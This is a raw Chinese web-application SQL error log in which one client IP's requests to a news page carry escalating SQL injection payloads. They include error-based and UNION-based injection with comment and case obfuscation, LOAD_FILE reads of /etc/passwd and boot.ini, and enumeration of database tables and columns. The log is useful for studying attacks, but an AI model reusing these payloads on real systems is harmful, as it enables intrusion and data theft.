错误SQL语句：
SELECT * FROM news  Where nid='47'A=0'
客户IP:188.64.175.211
时间 :2015-07-02 03:55:16

错误SQL语句：
SELECT nid FROM news  Where nid<'47'A=0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 03:55:16

错误SQL语句：
SELECT nid FROM news  Where nid>'47'A=0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 03:55:16

错误SQL语句：
SELECT * FROM news  Where nid=''0=A'
客户IP:188.64.175.211
时间 :2015-07-02 04:02:15

错误SQL语句：
SELECT nid FROM news  Where nid<''0=A' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:02:15

错误SQL语句：
SELECT nid FROM news  Where nid>''0=A' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:02:15

错误SQL语句：
SELECT * FROM news  Where nid='47'(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) ''
客户IP:188.64.175.211
时间 :2015-07-02 04:02:46

错误SQL语句：
SELECT nid FROM news  Where nid<'47'(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) '' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:02:46

错误SQL语句：
SELECT nid FROM news  Where nid>'47'(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) '' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:02:46

错误SQL语句：
SELECT * FROM news  Where nid='47' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1'
客户IP:188.64.175.211
时间 :2015-07-02 04:02:59

错误SQL语句：
SELECT nid FROM news  Where nid<'47' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:02:59

错误SQL语句：
SELECT nid FROM news  Where nid>'47' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:02:59

错误SQL语句：
SELECT * FROM news  Where nid='47' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1'
客户IP:188.64.175.211
时间 :2015-07-02 04:03:00

错误SQL语句：
SELECT nid FROM news  Where nid<'47' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:03:00

错误SQL语句：
SELECT nid FROM news  Where nid>'47' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:03:00

错误SQL语句：
SELECT * FROM news  Where nid='47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39 and '0'='0'
客户IP:188.64.175.211
时间 :2015-07-02 04:06:42

错误SQL语句：
SELECT * FROM news  Where nid='47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39 and '0'='0'
客户IP:188.64.175.211
时间 :2015-07-02 04:06:44

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:06:44

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:06:44

错误SQL语句：
SELECT * FROM news  Where nid='47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39 and '0'='0'
客户IP:188.64.175.211
时间 :2015-07-02 04:06:45

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:06:45

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:06:45

错误SQL语句：
SELECT * FROM news  Where nid='47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39 and '0'='0'
客户IP:188.64.175.211
时间 :2015-07-02 04:06:57

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:06:57

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:06:57

错误SQL语句：
SELECT * FROM news  Where nid='47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39 and '0'='0'
客户IP:188.64.175.211
时间 :2015-07-02 04:07:00

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:00

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:00

错误SQL语句：
SELECT * FROM news  Where nid='47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39 and '0'='0'
客户IP:188.64.175.211
时间 :2015-07-02 04:07:01

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:01

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:01

错误SQL语句：
SELECT * FROM news  Where nid='47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39 and '0'='0'
客户IP:188.64.175.211
时间 :2015-07-02 04:07:05

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:05

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:05

错误SQL语句：
SELECT * FROM news  Where nid='47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39 and '0'='0'
客户IP:188.64.175.211
时间 :2015-07-02 04:07:09

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:09

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:10

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:11

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:11

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:14

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:14

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:16

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:16

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/uSeR(),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:18

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/uSeR(),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:18

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:22

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:22

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x2f6574632f706173737764),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:28

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x2f6574632f706173737764),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:28

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x633a5c5c626f6f742e696e69),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:29

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x633a5c5c626f6f742e696e69),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:29

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x643a5c5c626f6f742e696e69),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:31

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x643a5c5c626f6f742e696e69),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:31

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x633a2f2f626f6f742e696e69),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:33

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x633a2f2f626f6f742e696e69),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:33

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x633a2f626f6f742e696e69),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:34

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/lOaD_FiLe(0x633a2f626f6f742e696e69),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:07:34

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/cOnCaT(/**/uSeR(),0x332150,/**/vErSiOn(),0x332150,/**/dAtAbAsE()),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:09:54

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/cOnCaT(/**/uSeR(),0x332150,/**/vErSiOn(),0x332150,/**/dAtAbAsE()),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:09:54

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:02

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:02

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/tAbLe_nAmE),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:02

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/tAbLe_nAmE),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:02

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e65777374797065),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:06

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e65777374797065),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:06

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e65777374797065),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:07

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e65777374797065),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:07

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e657773),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:15

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e657773),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:15

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e657773),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:19

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e657773),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:19

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM huisen.newstype),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:33

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM huisen.newstype),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:33

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,ifnull(ntid,char(32)),0x332150,ifnull(ntName,char(32)),0x217e21) /**/fRoM huisen.newstype /**/lImIt 0,1),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:37

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,ifnull(ntid,char(32)),0x332150,ifnull(ntName,char(32)),0x217e21) /**/fRoM huisen.newstype /**/lImIt 0,1),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:37

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,ifnull(ntid,char(32)),0x332150,ifnull(ntName,char(32)),0x217e21) /**/fRoM huisen.newstype /**/lImIt 1,1),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:39

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,ifnull(ntid,char(32)),0x332150,ifnull(ntName,char(32)),0x217e21) /**/fRoM huisen.newstype /**/lImIt 1,1),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:39

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6361736573),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:46

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6361736573),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:46

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6361736573),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:47

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6361736573),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:47

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x636173657374797065),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:54

错误SQL语句：
